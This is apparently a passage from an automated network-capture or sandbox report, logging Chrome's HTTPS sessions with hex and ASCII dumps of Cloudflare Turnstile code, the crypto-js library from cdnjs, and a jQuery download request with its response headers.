                                                                                                                                                                                                                                                                            2024-12-03 17:58:49 UTC1369INData Raw: 61 76 30 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42
                                                                                                                                                                                                                                                                            Data Ascii: av0/rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUB
                                                                                                                                                                                                                                                                            2024-12-03 17:58:49 UTC1369INData Raw: 63 74 7c 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72
                                                                                                                                                                                                                                                                            Data Ascii: ct||Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var
                                                                                                                                                                                                                                                                            2024-12-03 17:58:49 UTC1369INData Raw: 73 2c 6e 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28
                                                                                                                                                                                                                                                                            Data Ascii: s,n);var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(
                                                                                                                                                                                                                                                                            2024-12-03 17:58:49 UTC1369INData Raw: 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74
                                                                                                                                                                                                                                                                            Data Ascii: cument.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.st


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            10192.168.2.449752104.17.24.144431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:58:49 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                                                                                                                                                                                            Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-03 17:58:50 UTC964INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:58:50 GMT
                                                                                                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                                                                            ETag: W/"61182885-40eb"
                                                                                                                                                                                                                                                                            Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                                                                                                                                                                                            cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                            Age: 447107
                                                                                                                                                                                                                                                                            Expires: Sun, 23 Nov 2025 17:58:50 GMT
                                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KpVgZTRKqefN%2BYMB5cdL8e8sottEkSaoxXix%2Ff8z94%2BK3KnwWaARMv3oWPWxKQGeB8saLsE%2BrAH5%2BMV4R50HBaIVpjFMHeF8A5W1vHycCxbyjZtikH%2BvvSanswJdsN2KkrnpknUz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            CF-RAY: 8ec57272ea331a3c-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            2024-12-03 17:58:50 UTC405INData Raw: 37 62 65 64 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                                                                                                                                                                                            Data Ascii: 7bed!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                                                                                                                                                                                                            2024-12-03 17:58:50 UTC1369INData Raw: 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63
                                                                                                                                                                                                                                                                            Data Ascii: typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Objec
                                                                                                                                                                                                                                                                            2024-12-03 17:58:50 UTC1369INData Raw: 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d
                                                                                                                                                                                                                                                                            Data Ascii: lone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.random
                                                                                                                                                                                                                                                                            2024-12-03 17:58:50 UTC1369INData Raw: 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d
                                                                                                                                                                                                                                                                            Data Ascii: "==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=
                                                                                                                                                                                                                                                                            2024-12-03 17:58:50 UTC1369INData Raw: 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b
                                                                                                                                                                                                                                                                            Data Ascii: {for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[
                                                                                                                                                                                                                                                                            2024-12-03 17:58:50 UTC1369INData Raw: 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31
                                                                                                                                                                                                                                                                            Data Ascii: ?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<1
                                                                                                                                                                                                                                                                            2024-12-03 17:58:50 UTC1369INData Raw: 62 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67
                                                                                                                                                                                                                                                                            Data Ascii: buffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={string
                                                                                                                                                                                                                                                                            2024-12-03 17:58:50 UTC1369INData Raw: 6f 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b
                                                                                                                                                                                                                                                                            Data Ascii: o=r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJK
                                                                                                                                                                                                                                                                            2024-12-03 17:58:50 UTC1369INData Raw: 2e 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20
                                                                                                                                                                                                                                                                            Data Ascii: .abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var
                                                                                                                                                                                                                                                                            2024-12-03 17:58:50 UTC1369INData Raw: 41 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77
                                                                                                                                                                                                                                                                            Data Ascii: A[39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            11192.168.2.449754151.101.194.1374431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:58:50 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                                                                                                                                            Host: code.jquery.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-03 17:58:50 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Content-Length: 89501
                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                                                                                            ETag: "28feccc0-15d9d"
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:58:50 GMT
                                                                                                                                                                                                                                                                            Age: 3230805
                                                                                                                                                                                                                                                                            X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740072-EWR
                                                                                                                                                                                                                                                                            X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                            X-Cache-Hits: 5889, 160
                                                                                                                                                                                                                                                                            X-Timer: S1733248730.413592,VS0,VE0
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
